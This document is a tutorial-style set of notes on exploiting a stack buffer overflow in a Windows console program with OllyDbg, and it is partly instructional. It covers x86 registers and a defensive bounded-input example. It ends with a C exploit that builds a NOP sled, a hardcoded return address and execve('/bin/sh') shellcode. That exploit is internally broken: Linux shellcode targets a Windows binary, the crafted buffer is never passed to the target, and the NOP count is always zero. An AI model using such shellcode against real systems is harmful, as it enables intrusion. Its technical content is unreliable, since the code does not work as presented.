How to write an exploit for the tool.
I will try to do it by writing a simple program in C.
Use Code::Blocks to create a Win32 console application.
Open it in Hex Workshop.
Open it in OllyDbg and run it (Make -> Run).
Register values in OllyDbg:
- ESP (stack pointer): 0022FF8C
- EIP (instruction pointer): 00401280
- EBP (base pointer): 0022FF94
Try to use the application: enter a word and run. Then look at the registers again.
- ESP (stack pointer): 0022FF70
- EIP (instruction pointer): 00401283
- EBP (base pointer): 0022FF94
REGISTERS - components of the processor that store data and addresses
Processor registers
The 32-bit processor architecture has:
- Ten 32-bit and six 16-bit registers
Registers are divided into three categories:
- The main registers
- Control registers
- Segment registers
The main registers are divided into:
- Data registers - data
- Pointer registers - pointers
- Index registers - indices
DATA REGISTERS
The 32-bit data registers are used for arithmetic, logical and other operations.
- 32-bit registers -> EAX, EBX, ECX, EDX
- Their lower halves are used as 16-bit registers -> AX, BX, CX, DX
- The lower 16 bits are further split into 8-bit registers -> AH, AL, BH, BL, CH, CL, DH, DL
AX - (primary accumulator) used in input/output and in most arithmetic instructions.
BX - (base register) used for indexed addressing.
CX - (counter register) used for loops and iterative operations.
DX - (data register) used in input/output, multiplication and division.
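As an added illustration (not from the original notes), the following C program models how the 16-bit and 8-bit names alias the low part of a 32-bit register. The `reg32` union is a constructed model of one general register, not a real processor structure; the byte order it assumes is the little-endian layout of x86.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed model of one x86 general register: the 16-bit and 8-bit names
   overlay the low bytes of the 32-bit value (valid on little-endian x86). */
typedef union {
    uint32_t e;            /* EAX: the full 32-bit register */
    uint16_t x;            /* AX : low 16 bits of EAX */
    struct {
        uint8_t l;         /* AL : low byte of AX */
        uint8_t h;         /* AH : high byte of AX */
    } b;
} reg32;

uint16_t reg_ax(uint32_t eax) { reg32 r; r.e = eax; return r.x;   }
uint8_t  reg_ah(uint32_t eax) { reg32 r; r.e = eax; return r.b.h; }
uint8_t  reg_al(uint32_t eax) { reg32 r; r.e = eax; return r.b.l; }

/* Writing AL changes only the lowest byte; the upper 24 bits of EAX survive,
   which is what a "mov al, imm8" does on the real processor. */
uint32_t set_al(uint32_t eax, uint8_t al)
{
    reg32 r;
    r.e = eax;
    r.b.l = al;
    return r.e;
}

int main(void)
{
    uint32_t eax = 0x12345678u;
    printf("EAX=%08x AX=%04x AH=%02x AL=%02x\n",
           (unsigned)eax, reg_ax(eax), reg_ah(eax), reg_al(eax));
    printf("after mov al, 0xFF: EAX=%08x\n", (unsigned)set_al(eax, 0xFF));
    return 0;
}
```

Running it prints AX=5678, AH=56 and AL=78 for EAX=12345678, which is the overlap the list above describes: the small names are not separate storage but views onto the same register.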
POINTER REGISTERS
The pointer registers are the 32-bit EIP, ESP, EBP and the 16-bit IP, SP, BP.
The three categories of pointer registers:
- Instruction Pointer (IP)
The 16-bit IP register holds the offset address of the next instruction to be executed.
IP combined with the CS register (CS:IP) gives the full address of the current instruction in the code segment.
Segment address (offset) - the start address of the memory segment plus an offset value.
- Stack Pointer (SP)
The 16-bit SP register provides the offset value within the program stack.
SP combined with the SS register (SS:SP) refers to the current position of data and addresses in the program stack.
- Base Pointer (BP)
The 16-bit BP register mainly refers to parameter variables passed to a procedure.
The address in the SS register combined with BP locates the parameter on the stack; BP can also be combined with SI and DI as a base register for special addressing.
INDEX REGISTERS - indexed addressing (sometimes used in arithmetic operations)
- 32-bit -> ESI, EDI
- 16-bit -> SI, DI
Source Index (SI) - the source index
Destination Index (DI) - the destination index
Enter more symbols than the buffer holds - 55 symbols.
We see the stack buffer overflow.
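To make that overflow concrete from the defender's side, here is an added example (not the tool's source, which the notes do not show): a 55-byte `word` buffer as the notes describe, the unsafe copy pattern that lets a longer input run past it into the saved EBP and return address, and a bounded reader that truncates and reports the overlong input instead. The buffer size and the 60-character input are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

#define WORD_MAX 55   /* buffer size from the notes: 55 symbols overflow it */

/* Unsafe pattern (the kind of code behind the crash seen in OllyDbg): no
   length check, so an input longer than the buffer runs past it into the
   saved EBP and return address that sit above it on the stack. Shown for
   comparison only; nothing below calls it. */
void read_word_unsafe(char word[WORD_MAX], const char *input)
{
    strcpy(word, input);   /* writes strlen(input)+1 bytes, however many that is */
}

/* Hardened form: copies at most WORD_MAX-1 characters, always NUL-terminates,
   and returns 1 when the input had to be truncated so the caller can reject it. */
int read_word_bounded(char word[WORD_MAX], const char *input)
{
    size_t n = strlen(input);
    int truncated = (n >= WORD_MAX);
    if (truncated)
        n = WORD_MAX - 1;
    memcpy(word, input, n);
    word[n] = '\0';
    return truncated;
}

/* Constructed test input: a run of n 'A' characters (n < 200). */
static void make_run(char *dst, size_t n)
{
    memset(dst, 'A', n);
    dst[n] = '\0';
}

/* Feed n 'A's through the bounded reader; return the truncation flag. */
int try_input_truncated(size_t n)
{
    char attempt[200], word[WORD_MAX];
    make_run(attempt, n);
    return read_word_bounded(word, attempt);
}

/* Feed n 'A's through the bounded reader; return how many were stored. */
size_t try_input_stored_len(size_t n)
{
    char attempt[200], word[WORD_MAX];
    make_run(attempt, n);
    read_word_bounded(word, attempt);
    return strlen(word);
}

int main(void)
{
    char word[WORD_MAX];
    char attempt[61];
    make_run(attempt, 60);   /* constructed: 60 'A's, more than the buffer holds */

    if (read_word_bounded(word, attempt))
        fprintf(stderr, "input too long (%zu chars), kept %zu\n",
                strlen(attempt), strlen(word));
    else
        printf("word: %s\n", word);
    return 0;
}
```

With the 60-character input the bounded reader keeps 54 characters and reports the truncation, so ESP, EBP and the return address are untouched; the same input through `strcpy` would write past `word` and produce the register changes seen in the debugger.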
Try to write the exploit:
```c
// Exploit for target.exe
#include <process.h>   // execlp(): run another program
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <dos.h>

/* Minimal shellcode */
static char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP 0x90
#define LEN 88           // lpBuffer 58h -> decimal 88
#define RET 0x770F6BF4   // return address from OllyDbg

int main(void)
{
    char buffer[LEN];
    long retaddr = RET;
    int  i;
    int  nops;

    // fprintf performs formatted output to a stream;
    // stderr is the error-message stream (shown on screen)
    fprintf(stderr, "using address 0x%lx\n", retaddr);

    /* fill the whole buffer with the return address, 4 bytes at a time */
    for (i = 0; i < LEN; i += 4)
        *(long *)&buffer[i] = retaddr;

    /* fill the start of the buffer with NOPs, leaving room for the shellcode
       and the return address. The count is computed in int and clamped at 0:
       written as LEN - strlen(shellcode) - 100 in size_t arithmetic it wraps
       to a huge value when negative and the loop would run off the buffer. */
    nops = LEN - (int)strlen(shellcode) - 100;
    if (nops < 0)
        nops = 0;
    for (i = 0; i < nops; i++)
        *(buffer + i) = NOP;

    /* after the NOPs, copy in the execve() shellcode */
    memcpy(buffer + i, shellcode, strlen(shellcode));

    /* export the variable, run */
    execlp("target.exe", "target.exe", NULL);   // start target.exe

    return 0;
}
```